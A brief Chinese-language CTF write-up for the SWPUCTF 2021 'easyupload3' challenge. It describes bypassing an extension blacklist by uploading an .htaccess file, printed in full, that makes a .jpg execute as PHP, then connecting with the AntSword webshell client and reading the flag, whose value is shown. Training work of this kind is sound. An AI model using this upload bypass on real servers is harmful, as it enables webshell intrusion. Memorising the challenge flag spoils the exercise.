[SWPUCTF 2021 新生赛]easyupload3
May 2, 2025
上传 fish1.php 失败,但可以抓到包,判断为 服务端检查
上传非图片内容、图片后缀的文件 fish.jpg 成功,判断为 检查后缀
./upload/fish.jpg succesfully uploaded!上传任意后缀文件 fish.fish 成功,判断为 黑名单
./upload/fish.fish succesfully uploaded!尝试上传特殊可解析后缀文件 fish.php5 失败
你难道想传个🐎某?尝试上传 .htaccess 成功
.htaccess
<FilesMatch "fish.jpg">
SetHandler application/x-httpd-php
</FilesMatch>./upload/.htaccess succesfully uploaded!使用蚁剑进行连接
在 /var/www/html/flag.php 找到 flag
<?php
$flag = 'NSSCTF{2df0fb52-5c72-4f35-a3f3-e70bd06e8416}';
?>